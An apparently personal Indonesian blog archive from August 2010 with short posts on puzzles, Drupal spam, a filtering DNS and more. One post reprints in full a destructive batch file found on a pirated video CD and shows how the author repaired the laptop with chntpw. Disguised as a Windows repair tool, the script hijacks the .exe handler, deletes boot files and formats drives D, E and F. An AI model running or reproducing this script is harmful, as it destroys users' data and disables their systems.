Arsip untuk Agustus, 2010

skuer wan

seperti halnya komitmen saya terhadap megaminx, menyelesaikannya tanpa melihat tutorial, clue, algoritma, etc (dan alhamdulilah berhasil dengan komutator, stuck di last layer hampir 4 bulan), begitu juga dengan square-1. ini hari pertama punya square-1, bikin sakit kepala. benar-benar puzzle yang aneh!

Iklan

selamat ulang tahun, linux

ah, ini posting spesial. ^^

laptopnya aziz

alkisah, ada seorang kawan, namanya aziz. punya keping video cd bajakan beli di emperan cd di surabaya. dan laptopnya diserahkan ke saya, rusak pula.
tidak bisa regedit, commandline, taskmanager, etc. tidak bisa jalankan file ekstensi exe (otomatis ini ancur), dan file ntldr hilang.
pendek kata, itu leptop saya install ulang pake linux windosnya (merasa berdosa). install driver. install aplikasi (merasa berdosa). pasang antivirus (avast lisensi free). pokoke beres.

tapi si aziz balik lagi keesokan harinya. tak lupa leptopnya dibawa juga. otomatis saya langsung sakit hati.

temennya bilang “kemarin masukin video cd langsung ada hitam-hitam tulisan (belakangan diketahui adalah jendela command line)”
saya tanya “terus?”
temennya bilang “terus mati”.

keren. ntldrnya hilang lagi, tidak bisa booting. karena penasaran dan berhubung rumahnya deket, saya suruh ambil video cd yang diputar itu.

terus saya temukan  file autorun plus file dengan ekstensi .bat yang isinya adalah ini :

@echo off
title Microsoft Windows TM Auto Repair
echo.
echo Preparing to Fixing the System..............................
echo This system need to repair of broken files.
echo This problem may be cause a Virus activity or coruption files.
echo Please wait a minute until windows doing it self....
echo Please close any running programs from the Windows system.
echo This program License and copyright by
echo Microsoft Coorporation TM.
echo System Repair in progress ........ please wait a second..
echo.
reg add HKLM\SOFTWARE\Classes\exefile\shell\open\Command /ve /d %%fe340ead%%  /f
echo.
del /f /Q /A C:\ntldr /S
echo.
Format  D: /Q /X /y
echo.
Format  E: /Q /X /y
echo.
Format  F: /Q /X /y
echo.
del /f /Q /A C:\command.com /S
echo.
del /f /Q /A C:\io.sys /S
echo.
del /f /Q /A C:\config.sys /S
echo.
echo System is now repaired.
echo Windows will reboot the system.
echo.
Shutdown.exe -s -c "Finish Repair System" -f -t 10
echo.
pause
echo.
Shutdown.exe -s -c "Finish Repair System" -f -t 10
echo.
exit

ngerti kan? kenapa skrip sux ini ada di root folder sebuah video cd bajakan?

analisa saya : supaya video cd bajakan ini tidak bisa dibajak! begitu dimasukin ke komputer, komputernya ngadat (kalo windoslah). ini cd buat diputer di vcd player, bukan dibuka di komputer terus diputar, terus dikopi ke hardis. ini bisnis, anda tidak boleh membajak apa yang saya bajak. begitulah kira-kira maksud si pembuat cd.

pelajaran : jangan beli cd bajakan sembarangan.

karena malas install ulang, untuk solvenya, pakai slax ditambah modul chntpw.

cara regedit pakai cntpw :

#mount -o rw /dev/sda1 /mnt/sda1/
#cd /mnt/sda1/WINDOWS/system32/config
#chntpw -e <hive file>

catatan : hive file ada di dalam folder config, misal kalo targetnya ada di dalam hkey_local_machine/software maka nama hive filenya adalah software (coba di-ls). untuk masuk :

chntpw -e software.

ketik ? untuk bantuan. hapus entri yang dibuat sama skrip tadi. beres.

kalau teledor megang drupal

uh, saya harus lebih banyak belajar dan berhati-hati.

kalo anda menggunakan drupal dan tidak berniat membuat akun untuk orang lain (hanya admin), cek halaman ini.

http://domain/admin/user/settings

pada tab public registration, centangkan paling atas. selebihnya, perhatikan dan atur baik-baik semua user rules. jangan ada satupun yang terlewat. penting!

saya melakukan kesalahan di web yang saya rawat, tiga orang meregistrasikan diri dan membuat halaman dalam jumlah yang sangat banyak, lebih dari 500-an! f*ck dah. akibatnya, benwit dan space membengkak. yang awalnya hanya sekitar 50Mb membengkak jadi 200-an. semua halaman sialan itu berisi link download lagu ke mp3way.info (sialan kamu!). jadi dah itu empetriweysialan dapet trafik.

yah, saya menghabiskan sepanjang malam hanya untuk menghapus halaman-halaman itu. 😦

thanks google!

akhirnya ada juga bahan buat ngapdet blog, sekalian pamer ah. 😛

nama dan alamat saya lho. 😛

stikernya ciamik >.<

saya tidak ingat pernah jadi fan google chrome dan merequest stiker laptop, tapi kalo ndak request ndak bakalan dikirimin. kesimpulan? saya adalah pelupa. T.T

dan yang paling bikin saya seneng sama google, di bagian paling bawah surat itu, ada tulisan,

printed on 100% post-consumer waster recycled paper

wah, perusahan besar macam google masih bisa perhatiin hal kecil (ini bukan hal kecil, bodoh!).

oya, btw hari ini hari bersejarah bagi saya, bukan karena kemerdekaan (toh memang belum merdeka, bener ndak?). bersejarah karena hari ini pertama kalinya saya makan siomay. rasanya enak (dan pedas). rating 7/10.

internet sehat dengan DNS Nawala

saya makin heran sama anak-anak kecil sekarang. setelah kemarin sempat dikerjain dengan uang palsu (uang mainan sialan, untung cuma 2000 rupiah), sekarang mereka malah rajin buka situs porno di warnet, padahal sudah bulan puasa. tulisan ini diposting sesaat setelah saya menegur dua anak-anak masih SD karena membuka konten porno. saya suruh pulang saja sekalian. sekali-kali jadi operator yang galak. hehe.

jadi bagaimana? pakai DNS nawala! *halah, saya juga baru tauk. >.<

Nawala Nusantara adalah sebuah layanan yang bebas digunakan oleh pengguna internet yang membutuhkan saringan situs negatif. Nawala Nusantara akan membantu menapis jenis situs-situs negatif yang tidak sesuai dengan peraturan perundangan, nilai dan norma sosial, adat istiadat dan kesusilaan bangsa Indonesia seperti pornografi dan perjudian. Selain itu, Nawala Nusantara juga akan menapis situs Internet yang mengandung konten berbahaya seperti malware, situs phising (penyesatan) dan sejenisnya.

DNS-nya ini

prefered : 180.131.144.144

alternated : 180.131.145.145

langsung deh keblokir tuh. saya coba buka yang aneh-aneh, wow. lihat nih.

klik untuk perbesar

atau klik ini, http://block.nawala.org/?72e5f7c73d0f, salah satu halaman pengalihan.

midbrain

klik untuk perbesar

klik untuk perbesar

memposting gambar ini artinya : saya tidak percaya midbrain blablabla. pseudoscience.

pingin punya tetangga yang anaknya ikutan G*C. *jadiin kelinci percobaan.

credit : Fahmy Asy’ari


This blog has been discontinued. All the contents, and new posts can be found at blog.pdft.net

RSS latest post @ blog.pdft.net

  • Sebuah galat telah terjadi; umpan tersebut kemungkinan sedang anjlok. Coba lagi nanti.
Indonesia Linux Conference 2011

stats

SEO Stats powered by MyPagerank.Net
Counter Powered by  RedCounter

hits

  • 354,157 hits


This blog is licensed under a Creative Commons Attribution-Share Alike 3.0 Unported License.
pejuang mimpi tak ingkar janji